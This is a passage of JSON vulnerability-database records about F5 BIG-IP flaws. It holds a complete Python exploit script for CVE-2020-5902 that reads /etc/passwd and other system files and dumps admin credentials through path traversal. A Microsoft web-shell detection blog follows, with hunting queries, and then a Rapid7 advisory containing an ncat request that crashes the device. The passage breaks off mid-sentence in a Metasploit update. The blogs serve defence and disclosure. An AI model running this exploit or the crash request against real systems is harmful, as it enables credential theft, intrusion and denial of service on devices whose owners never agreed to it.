"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-5902", "CVE-2020-5902"], "modified": "2020-07-26T00:00:00", "id": "EDB-ID:48711", "href": "https://www.exploit-db.com/exploits/48711", "sourceData": "# Exploit Title: F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion\r\n# Date: 2019-08-17\r\n# Exploit Author: Carlos E. Vieira\r\n# Vendor Homepage: https://www.f5.com/products/big-ip-services\r\n# Version: <= 13.1.3\r\n# Tested on: BIG-IP 13.1.3 Build 0.0.6\r\n# CVE : CVE-2020-5902\r\n\r\n#!/usr/bin/env python\r\n\r\nimport requests\r\nimport sys\r\nimport time\r\nimport urllib3\r\nimport json \r\nurllib3.disable_warnings()\r\n\r\nglobal target\r\n\r\ndef checkTarget():\r\n\r\n r = requests.head(target + \"/tmui/login.jsp\", verify=False)\r\n if(r.status_code == 200):\r\n return True\r\n else:\r\n return False\r\n\r\ndef checkVuln():\r\n\r\n r = requests.get(target + \"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd\", verify=False)\r\n if(r.status_code == 200):\r\n \r\n data = json.loads(r.text)\r\n if(len(data['output']) > 0):\r\n return True \r\n else:\r\n return False\r\n\r\n else:\r\n return False\r\n\r\ndef leakPasswd():\r\n print(\"[+] Leaking /etc/passwd from server\")\r\n time.sleep(2)\r\n exploit('/etc/passwd')\r\n\r\n\r\ndef leakHosts():\r\n print(\"[+] Leaking /etc/hosts from server\")\r\n time.sleep(2)\r\n exploit('/etc/hosts')\r\n\r\ndef leakLicence():\r\n\r\n print(\"[+] Leaking /config/bigip.license from server\")\r\n time.sleep(2)\r\n exploit('/config/bigip.license')\r\n\r\ndef leakAdmin():\r\n\r\n print(\"[+] Leaking admin credentials from server\")\r\n time.sleep(2)\r\n r = requests.get(target + \"/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin\", verify=False)\r\n if(r.status_code == 200):\r\n \r\n data = json.loads(r.text)\r\n if(len(data['output']) > 0 ):\r\n print(data['output'])\r\n else:\r\n print(\"[X] Admin credentials not found\")\r\n else:\r\n print(\"[X] Fail to read file\")\r\n\r\n\r\ndef exploit(file):\r\n \r\n r = requests.get(target + \"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=\" + file, verify=False)\r\n if(r.status_code == 200):\r\n data = json.loads(r.text)\r\n print(data['output'])\r\n else:\r\n print(\"[X] Fail to read file\")\r\n\r\ndef memoryLeak():\r\n print(\"[!] Leaking tomcat process from server\")\r\n time.sleep(2) \r\n r = requests.get(target + \"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/proc/self/cmdline\", verify=False)\r\n if(r.status_code == 200):\r\n data = json.loads(r.text)\r\n if(len(data['output'])>0):\r\n print(\"Command: \" + data['output'])\r\n\r\ndef main(host):\r\n\r\n print(\"[+] Check target...\")\r\n global target\r\n target = \"https://\" + host\r\n\r\n check = checkTarget()\r\n if(check):\r\n print(\"[~] Target is available\")\r\n\r\n vuln = checkVuln()\r\n if(vuln):\r\n print(\"[+] Target is vulnerable!\")\r\n\r\n time.sleep(1)\r\n print(\"[~] Leak information from target!\")\r\n time.sleep(1)\r\n leakPasswd()\r\n leakHosts()\r\n leakLicence()\r\n leakAdmin()\r\n memoryLeak()\r\n else:\r\n print(\"[X] Target is't vulnerable\")\r\n\r\n else:\r\n print(\"[x] Target is unavailable\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n if(len(sys.argv) < 2):\r\n print(\"Use: python {} ip/dns\".format(sys.argv[0]))\r\n else:\r\n host = sys.argv[1]\r\n main(host)", "sourceHref": "https://www.exploit-db.com/download/48711", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mmpc": [{"lastseen": "2021-02-11T17:27:09", "description": "One year ago, we reported the steady increase in the use of web shells in attacks worldwide. The latest Microsoft 365 Defender data shows that this trend not only continued, it accelerated: every month from August 2020 to January 2021, we registered an average of 140,000 encounters of these threats on servers, almost double the 77,000 monthly average we [saw last year](<https://www.microsoft.com/security/blog/2020/02/04/ghost-in-the-shell-investigating-web-shell-attacks/>).\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/02/Fig1-web-shell-encounters-trend.png)\n\n_Figure 1. Web shell encounters on servers_\n\nThe escalating prevalence of web shells may be attributed to how simple and effective they can be for attackers. A web shell is typically a small piece of malicious code written in typical web development programming languages (e.g., ASP, PHP, JSP) that attackers implant on web servers to provide remote access and code execution to server functions. Web shells allow attackers to run commands on servers to steal data or use the server as launch pad for other activities like credential theft, lateral movement, deployment of additional payloads, or hands-on-keyboard activity, while allowing attackers to persist in an affected organization.\n\nAs web shells are increasingly more common in attacks, both commodity and targeted, we continue to monitor and investigate this trend to ensure customers are protected. In this blog, we will discuss challenges in detecting web shells, and the Microsoft technologies and investigation tools available today that organizations can use to defend against these threats. We will also share guidance for hardening networks against web shell attacks.\n\n## Web shells as entry point for attacks\n\nAttackers install web shells on servers by taking advantage of security gaps, typically vulnerabilities in web applications, in internet-facing servers. These attackers scan the internet, often using public scanning interfaces like [shodan.io](<https://www.shodan.io/>), to locate servers to target. They may use previously fixed vulnerabilities that unfortunately remain unpatched in many servers, but they are also known to quickly take advantage of newly disclosed vulnerabilities.\n\nFor example, on June 30, F5 Networks released a patch for CVE-2020-5902, a remote code execution (RCE) vulnerability in Traffic Management User Interface (TMUI). The vulnerability is a [directory traversal bug](<https://owasp.org/www-community/attacks/Path_Traversal>) with a CVSS score of 9.8 out of a possible 10. Just four days later, on July 4, exploit code was added to a Metasploit module.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/02/Fig2-exploit-code.png)\n\n_Figure 2. CVE-2020-5902 __exploit code _\n\nThe following day, Microsoft researchers started seeing the exploit being used by attackers to upload a web shell to vulnerable servers. The web shell was used to run common cryptocurrency miners. In the days that followed, industry security researchers saw the exploit being broadly used to deploy web shells, with multiple variants surfacing not long after.\n\nThis incident demonstrates the importance of keeping servers up to date and hardened against web shell attacks. Web servers are frequently accessible from the internet and can be used by attackers to gain access to a network.\n\n## Web shells as persistence mechanisms\n\nOnce installed on a server, web shells serve as one of the most effective means of persistence in an enterprise. We frequently see cases where web shells are used solely as a persistence mechanism. Web shells guarantee that a backdoor exists in a compromised network, because an attacker leaves a malicious implant after establishing an initial foothold on a server. If left undetected, web shells provide a way for attackers to continue to gather data from and monetize the networks that they have access to.\n\nCompromise recovery cannot be successful and enduring without locating and removing attacker persistence mechanisms. And while rebuilding a single compromised system is a great solution, restoring existing assets is the only feasible option for many. So, finding and removing all backdoors is a critical aspect of compromise recovery.\n\nAnd this brings us back to the challenge of web shell detection. As we mentioned earlier, web shells can be generalized as a means of executing arbitrary attacker input by way of an implant. The first challenge is dealing with just how many ways an attacker can execute code. Web applications support a great array of languages and frameworks and, thus, provide a high degree of flexibility and compatibility that attackers take advantage of.\n\nIn addition, the volume of network traffic plus the usual noise of constant internet attacks means that targeted traffic aimed at a web server can blend right in, making detection of web shells a lot harder and requiring advanced behavior-based detections that can identify and stop malicious activities that hide in plain sight.\n\n## Challenges in detecting web shells\n\nWeb shells can be built using any of several languages that are popular with web applications. Within each language, there are several means of executing arbitrary commands and there are multiple means for arbitrary attacker input. Attackers can also hide instructions in the user agent string or any of the parameters that get passed during a web server/client exchange.\n\nAttackers combine all these options into just a couple of bytes to produce a web shell, for example:\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/02/Fig3-web-shell-example-300x291.png)\n\n_Figure 3. Example of web shell code_\n\nIn the example above, the only readable word in the web shell is \u201ceval\u201d, which can be easy to miss or misinterpret. When analyzing script, it is important to leverage contextual clues. For example, a scheduled task called \u201cUpdate Google\u201d that downloads and runs code from a suspicious website should be inspected more closely.\n\nWith web shells, analyzing context can be a challenge because the context is not clear until the shell is used. In the following code, the most useful clues are \u201csystem\u201d and \u201ccat /etc/passwd\u201d, but they do not appear until the attacker interacts with the web shell:\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/02/Fig4-web-shell-example-2-1024x233.png)\n\n_Figure 4. Another example of web shell code_\n\nAnother challenge in detecting web shells is uncovering intent. A harmless-seeming script can be malicious depending on intent. But when attackers can upload arbitrary input files in the web directory, then they can upload a full-featured web shell that allows arbitrary code execution\u2014which some very simple web shells do.\n\nThese file-upload web shells are simple, lightweight, and easily overlooked because they cannot execute attacker commands on their own. Instead, they can only upload files, such as full-featured web shells, onto web servers. Because of their simplicity, they are difficult to detect and can be dismissed as benign, and so they are often used by attackers for persistence or for early stages of exploitation.\n\nFinally, attackers are known to hide web shells in non-executable file formats, such as media files. Web servers configured to execute server-side code create additional challenges for detecting web shells, because on a web server, a media file is scanned for server-side execution instructions. Attackers can hide web shell scripts within a photo and upload it to a web server. When this file is loaded and analyzed on a workstation, the photo is harmless. But when a web browser asks a server for this file, malicious code executes server side.\n\nThese challenges in detecting web shells contribute to their increasing popularity as an attack tool. We constantly monitor how these evasive threats are utilized in cyberattacks, and we continue to improve protections. In the next section, we discuss how behavior-based detection technologies help us protect customers from web shell attacks.\n\n## How Microsoft helps defend networks against web shell attacks\n\nGaining visibility into internet-facing servers is key to detecting and addressing the threat of web shells. To tackle challenges in detecting these threats, [Microsoft Defender for Endpoint](<https://www.microsoft.com/en-us/microsoft-365/security/endpoint-defender>) uses a combination of durable protections that prevent web shell installation and behavior-based detections that identify related malicious activity. Microsoft Defender for Endpoint exposes malicious behavior by analyzing script file writes and process executions. Due to the nature of web shells, static analysis is not effective\u2014as we have shown, it is relatively easy to modify web shells and bypass static protections. To effectively deliver protection, Microsoft Defender for Endpoint uses multiple layers of protection through behavior inspection.\n\n[Behavior-based blocking and containment capabilities](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/behavioral-blocking-containment>), which use engines that specialize in detecting threats by analyzing behavior, monitor web-accessible directories for any new script file creation. While file creation events alone cannot be treated as suspicious, correlating such events with the responsible process tree can yield more reliable signals and surface malicious attempts. The engine can then remediate the script, neutralizing the primary infection vector. For example, IIS instance (_w3wp.exe_) running suspicious processes such as \u2018_cmd.exe /c echo\u2019_, \u2018_certutil.exe\u2019_, or \u2018_powershell.exe\u2019_ that result in the creation of script files in web -accessible folders is a rare event and is, thus, typically a strong sign of web server compromise and web shell installation.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/02/a.png)\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/02/b.png)\n\nMicrosoft Defender for Endpoint also detects web shell installation attempts originating from remote systems within the organization using various lateral movement methods. For example, attackers have been observed to drop web shells through Windows Remote Management (WinRM) or use existing Windows commands to transfer web shells over SMB. On the web server, these remote actions are carried by system processes, thus giving visibility into the process tree. System privilege process dropping script files is another suspicious event and provides the behavior inspection engines ways to remediate the script before the attackers can perform any malicious actions.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/02/c.png)\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/02/d.png)\n\nBehavior-based protection also provides post-compromise defense in scenarios where attackers are already operating and running commands on web servers. Once attackers gain access to a server, one of their first steps is to understand the privilege and the environment they have access to by using built-in reconnaissance commands that are not typically used by web applications. IIS instance (_w3wp.exe_) running commands like _\u2018net\u2019_, _\u2018whoami\u2019_, _\u2018dir\u2019_, _\u2018cmd.exe\u2019_, or _\u2018query\u2019_, to name a few, is typically a strong early indicator of web shell activity.\n\nIIS servers have built-in management tools used by administrators to perform various maintenance tasks. These platforms surface various PowerShell cmdlets that can expose critical information to the attackers. IIS instances (_w3wp.exe_) that host various web-facing client services such as Outlook on the web (formerly known as Outlook Web App or OWA) or Exchange admin center (EAC; formerly known as the Exchange Control Panel or ECP) accessing the management platform or executing below cmdlets is a suspicious activity and signifies a hands-on-keyboard attack. The behavior engine monitors execution of such cmdlets and the responsible process trees, for example:\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/02/e.png)\n\nWith its behavior-based blocking and containment capabilities, Microsoft Defender for Endpoint can identify and stop behavior associated with web shell attacks. It raises alerts for these detections, enabling security operations teams to use the rich investigation tools in Microsoft Defender for Endpoint to perform additional investigation and hunting for related or similar threats.\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/02/Fig5-Microsoft-Defender-alert-web-shell-1a.png)\n\n![](https://www.microsoft.com/security/blog/wp-content/uploads/2021/02/Fig5-Microsoft-Defender-alert-web-shell-2.png)\n\n_Figure 5. Microsoft Defender for Endpoint alerts for behaviors related to web shell attacks_\n\nMicrosoft 365 Defender and Microsoft Defender for Endpoint customers can also run advanced hunting queries to proactively hunt for web shell attacks:\n\nLook for suspicious process that IIS worker process (w3wp.exe), Apache HTTP server processes (_httpd.exe_, _visualsvnserver.exe_), etc. do not typically initiate (e.g., _cmd.exe_ and _powershell.exe_)\n \n \n DeviceProcessEvents\n | where InitiatingProcessCommandLine has_any(\"beasvc.exe\",\"coldfusion.exe\",\"httpd.exe\",\"owstimer.exe\",\"visualsvnserver.exe\",\"w3wp.exe\") or InitiatingProcessCommandLine contains 'tomcat'\n | where FileName != \"csc.exe\" // exclude csharp compiler\n | where FileName != \"php-cgi.exe\" //exclude php group, fast cgi\n | where FileName != \"vbc.exe\" //exclude Visual Basic Command Line Compiler\n | summarize by FileName\n\nLook for suspicious web shell execution, this can identify processes that are associated with remote execution and reconnaissance activity (example: "arp", "certutil", "cmd", "echo", "ipconfig", "gpresult", "hostname", "net", "netstat", "nltest", "nslookup", "ping", "powershell", "psexec", "qwinsta", "route", "systeminfo", "tasklist", "wget", "whoami", "wmic", etc.)\n \n \n DeviceProcessEvents\n | where InitiatingProcessParentFileName in~(\"beasvc.exe\",\"coldfusion.exe\",\"httpd.exe\",\"owstimer.exe\",\"visualsvnserver.exe\",\"w3wp.exe\") or InitiatingProcessParentFileName startswith \"tomcat\"\n | where InitiatingProcessFileName in~(\"powershell.exe\",\"powershell_ise.exe\",\"cmd.exe\")\n | where FileName != 'conhost.exe'\n\n## Hardening servers against web shells\n\nA single web shell allowing attackers to remotely run commands on a server can have far-reaching consequences. With script-based malware, however, everything eventually funnels to a few natural chokepoints, such as _cmd.exe_, _powershell.exe_, and _cscript.exe_. As with most attack vectors, prevention is critical.\n\nOrganizations can harden systems against web shell attacks by taking these preventive steps:\n\n * Identify and remediate vulnerabilities or misconfigurations in web applications and web servers. Use Threat and Vulnerability Management to discover and fix these weaknesses. Deploy the latest security updates as soon as they become available.\n * Implement proper segmentation of your perimeter network, such that a compromised web server does not lead to the compromise of the enterprise network.\n * Enable antivirus protection on web servers. [Turn on cloud-delivered protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/enable-cloud-protection-windows-defender-antivirus>) to get the latest defenses against new and emerging threats. Users should only be able to upload files in directories that can be scanned by antivirus and configured to not allow server-side scripting or execution.\n * Audit and review logs from web servers frequently. Be aware of all systems you expose directly to the internet.\n * Utilize the Windows Defender Firewall, intrusion prevention devices, and your network firewall to prevent command-and-control server communication among endpoints whenever possible, limiting lateral movement, as well as other attack activities.\n * Check your perimeter firewall and proxy to restrict unnecessary access to services, including access to services through non-standard ports.\n * Practice good credential hygiene. Limit the use of accounts with local or domain admin level privileges.\n\nWeb shells and the attacks that they enable are a multi-faceted threat that require comprehensive visibility across domains and platforms. [Microsoft 365 Defender](<https://aka.ms/m365d>) correlates threat data from endpoints, email and data, identities, and apps to coordinate cross-domain protection. [Learn how you can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>).\n\n \n\n_Detection and Response Team (DART)_\n\n_Microsoft Defender Security Research Team_\n\n \n\nThe post [Web shell attacks continue to rise](<https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-11T17:00:05", "type": "mmpc", "title": "Web shell attacks continue to rise", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2021-02-11T17:00:05", "id": "MMPC:9AAC6D759E6AD62F92B56B228C39C263", "href": "https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-03-25T16:50:12", "description": "![F5 Discloses Eight Vulnerabilities\u2014Including Four Critical Ones\u2014in BIG-IP Systems](https://blog.rapid7.com/content/images/2021/03/F5.jpg)\n\n**Update March 25, 2021:** CVE-2021-22986 is now being actively exploited in the wild by a range of malicious actors. Rapid7 has in-depth technical analysis on this vulnerability, including proof-of-concept code and information on indicators of compromise, available [here](<https://attackerkb.com/assessments/f6b19d24-b24e-4abd-98cf-2988d7424311>).\n\nOn March 10, 2021, F5 disclosed eight vulnerabilities, four of which are deemed "critical", the most severe of which is CVE-2021-22986, an **unauthenticated remote code execution** weakness that enables remote attackers to execute arbitrary commands on compromised BIG-IP devices:\n\n * [K03009991: iControl REST unauthenticated remote command execution vulnerability CVE-2021-22986](<https://support.f5.com/csp/article/K03009991>) (actively exploited in the wild)\n * [K18132488: Appliance mode TMUI authenticated remote command execution vulnerability CVE-2021-22987](<https://support.f5.com/csp/article/K18132488>)\n * [K70031188: TMUI authenticated remote command execution vulnerability CVE-2021-22988](<https://support.f5.com/csp/article/K70031188>)\n * [K56142644: Appliance mode Advanced WAF/ASM TMUI authenticated remote command execution vulnerability CVE-2021-22989](<https://support.f5.com/csp/article/K56142644>)\n * [K45056101: Advanced WAF/ASM TMUI authenticated remote command execution vulnerability CVE-2021-22990](<https://support.f5.com/csp/article/K45056101>)\n * [K56715231: TMM buffer-overflow vulnerability CVE-2021-22991](<https://support.f5.com/csp/article/K56715231>)\n * [K52510511: Advanced WAF/ASM buffer-overflow vulnerability CVE-2021-22992](<https://support.f5.com/csp/article/K52510511>)\n * [K66851119: F5 TMUI XSS vulnerability CVE-2021-22994](<https://support.f5.com/csp/article/K66851119>)\n\nOn March 18, 2021, NCC Group [reported seeing in the wild exploitation attempts](<https://twitter.com/NCCGroupInfosec/status/1372614697158053888?s=20>) and they, along with other sources, expect that final development of a complete attack chain is imminent.\n\nGiven that a complete exploit chain will be available soon, we recommend patching F5 systems that expose the affected planes (see below) within the next 3\u20135 days and F5 systems that only expose affected planes internally within a 30-day patch window that hopefully started eight days ago, provided that your organization follows a typical 30-, 60-, 90-day prioritization scheme. If your organization does not have a defined patch cadence system, Rapid7 still recommends that you consider applying these internal system patches within the next 20 days.\n\n## Critical vulnerability overview\n\n### [CVE-2021-22986](<https://support.f5.com/csp/article/K03009991>)\n\n_iControl REST unauthenticated remote command execution vulnerability (CVSSv3 9.8)._\n\nAn HTTP REST API endpoint exposed on the **control plane** of F5 devices has an unauthenticated remote code execution vulnerability, enabling attackers to execute arbitrary code/commands on compromised devices. This impacts BIG-IP systems 7.0.0, 7.1.0, 12.x, and later, as well as any BIG-IQ (F5 BIG-IP centralized management service) version regardless of configuration.\n\n### [CVE-2021-22991](<https://support.f5.com/csp/article/K90004114>)\n\n_Traffic Management Microkernel (TMM) buffer-overflow vulnerability (CVSSv3 9.0)._\n\nThe Traffic Management Microkernel (TMM), which handles requests to virtual servers on the **data plane**, improperly handles certain, undisclosed uniform resource identifiers (URIs). Malicious HTTP requests may cause a buffer overflow and result in a denial-of-service attack. You are vulnerable to exploits if any of the following configurations apply to your F5 deployments:\n\n * BIG-IP 12.1.x or later using BIG-IP Access Policy Manager (APM) in is running in any configuration\n * Specific functions are defined in enabled iRules or LTM policies\n * The URL categorization feature is enabled and in use in either BIG-IP PEM or Secure Web Gateway\n\nFurthermore, customers in the F5 "early access" program are also vulnerable if they are using the Advanced WAF Risk Engine.\n\nThe following commands can be run from a TMOS Shell (tmsh) and will return iRules / LTM policies that can be reviewed against [example policies provided by F5](<https://support.f5.com/csp/article/K56715231>) to determine whether your configurations are at risk:\n \n \n tmsh -q -c \"cd / ; list /ltm rule recursive\" | egrep 'ltm rule|normalize' | grep -B1 normalize # iRules recursive query\n tmsh -q -c \"cd / ; list /ltm policy recursive\" | egrep 'ltm policy|normalize' | grep -B1 normalize # LTM policies recursive query\n \n\n### [CVE-2021-22987](<https://support.f5.com/csp/article/K18132488>)\n\n_Appliance Mode TMUI **authenticated** remote command execution vulnerability (CVSSv3 9.9)._\n\nIf an F5 device is running in [appliance mode](<https://support.f5.com/csp/article/K12815>), the Traffic Management User Interface (TMUI)/Configuration utility on the **control plane** has an authenticated remote code execution vulnerability in an unknown number of target URL paths, enabling attackers to execute arbitrary code/commands on compromised devices.\n\n### [CVE-2021-22992](<https://support.f5.com/csp/article/K52510511>)\n\n_Advanced WAF/ASM buffer-overflow vulnerability (CVSSv3 9.0)._\n\nIf an F5 Advanced WAF/BIG-IP ASM virtual server has a [Login Page](<https://techdocs.f5.com/en-us/bigip-14-1-0/big-ip-asm-implementations-14-1-0/creating-login-pages-for-secure-application-access.html>) policy defined, malicious HTTP **responses** may cause a buffer overflow, resulting in a denial-of-service attack and possibly remote code execution. This vulnerability is exposed on the **data plane**.\n\n**NOTE:** The **data plane** refers to any traffic handled by a virtual server, SNAT, NAT, or other non-control-plane-traffic handler. The **control plane** refers to management-related services and traffic flowing to them, such as the Configuration utility (TMUI), iControl REST, and SSH, either through the management IP address or a self IP address exposing the HTTPS or SSH ports (usually 443 or 22).\n\n## Selected expanded details\n\nA [Project Zero](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2132>) report on CVE-2021-22992 posted by [Felix Wilhelm](<https://twitter.com/_fel1x/status/1369675356073041924?s=20>) notes that the vulnerable condition is triggered when BIG-IP systems have rules in place that process HTTP response headers (login pages are given as an example). The web application firewall does not process overlong HTTP response headers properly, and this can lead to a stack-based overflow.\n\n_This is not a trivial weakness to set up_, and in many cases requires knowledge or control of back-end applications behind F5 systems. The researcher notes three scenarios where attackers may be able to gain more granular control over HTTP response headers:\n\n 1. **HTTP header injection**: If one of the backend applications that sits behind an F5 system does not properly handle carriage returns/line feeds (CR/LF) in some inbound HTTP headers that are returned in the HTTP response, an attacker can use this weakness in that application (_not the F5 system itself_) to cause the overflow situation in the F5 system..\n 2. **Request smuggling + HTTP/0.9**: Some F5 configurations may still be vulnerable to various [request smuggling](<https://en.wikipedia.org/wiki/HTTP_request_smuggling>) techniques. Attackers may use an old version of the HTTP protocol (HTTP/0.9) to issue a simplified request to F5-fronted applications. These HTTP 0.9 requests will only return an HTML response without response headers. It may be possible to craft such a request to return user-controllable HTML responses that will trigger this stack-based overflow.\n 3. **Compromised backend**: If an attacker has control over one or more F5-fronted applications, they may be able to use those systems to craft sufficiently large responses to trigger the overflow condition.\n\nThe same researcher also posted a [Project Zero report](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2126>) on CVE-2021-22991 noting a weakness in how IPv6 hostnames are processed. An example configuration and demonstration is provided there and reproduced below.\n\nIf there is an F5 iRule such as:\n \n \n when HTTP_REQUEST { \n log local0. \"normalized: [HTTP::uri -normalized]\" \n log local0. \"uri: [HTTP::uri]\"\n }\n \n\na malicious request of the form:\n \n \n echo -e \"GET h://[f] HTTP/1.1\\r\\n\\r\\n\" | ncat --ssl 10.154.0.3 443\n \n\nwill result in uninitialized memory to `/var/log/ltm` on the F5 host, which can lead to a direct crash Traffic Management Microkernel and, thus, a denial of service.\n\nExploitation is dependent on certain iRule configurations being in place, but attackers have plenty of time on their hands and an abundance of compromised hosts available to try many combinations of requests, and F5 systems are easily discoverable on the internet.\n\n## Available mitigations\n\nUntil it is possible to install fixed versions, organizations can use the following F5 references as temporary mitigations for CVE-2021-22986 and CVE-2021-22987 to restrict access to iControl REST API endpoints:\n\n * [Block iControl REST access through the self IP address](<https://support.f5.com/csp/article/K03009991#proc1>)\n * [Block iControl REST access through the management interface](<https://support.f5.com/csp/article/K03009991#proc2>)\n\n## InsightVM Coverage\n\nWe currently have coverage for the following CVEs:\n\n * CVE-2021-22986\n * CVE-2021-22987\n * CVE-2021-22988\n * CVE-2021-22991\n * CVE-2021-22994\n\nWe are investigating coverage for the remaining three CVEs affecting F5 Advanced WAF/BIG-IP ASM:\n\n * CVE-2021-22989\n * CVE-2021-22990\n * CVE-2021-22992\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2021-03-18T20:19:22", "type": "rapid7blog", "title": "F5 Discloses Eight Vulnerabilities\u2014Including Four Critical Ones\u2014in BIG-IP Systems", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22986", "CVE-2021-22987", "CVE-2021-22988", "CVE-2021-22989", "CVE-2021-22990", "CVE-2021-22991", "CVE-2021-22992", "CVE-2021-22994"], "modified": "2021-03-18T20:19:22", "id": "RAPID7BLOG:72759E1136A76135F26DD97485912606", "href": "https://blog.rapid7.com/2021/03/18/f5-discloses-eight-vulnerabilities-including-four-critical-ones-in-big-ip-systems/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-04-02T20:50:20", "description": "## Sprinkle on the Modules\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2021/04/metasploit-ascii-1.png)\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2021/04/sprinkle-on-the-modules.png) \nThe first quarter of 2021 has given us wave after wave of Exchange vulnerabilities, and while our awesome contributors helped us continue coverage with another Exchange module we were able to add to Metasploit, we also added modules covering very heavy-hitting vulnerabilities in F5, SAP, and SaltStack that may have gotten less notice in the shadow of the Exchange vulnerabilities earlier this quarter. This update offers two new modules from community contributor Vladimir Ivanov targeting remote code execution vulnerabilities in SAP, a new module by our own Will Vu covering a remote code execution vulnerability in F5 Big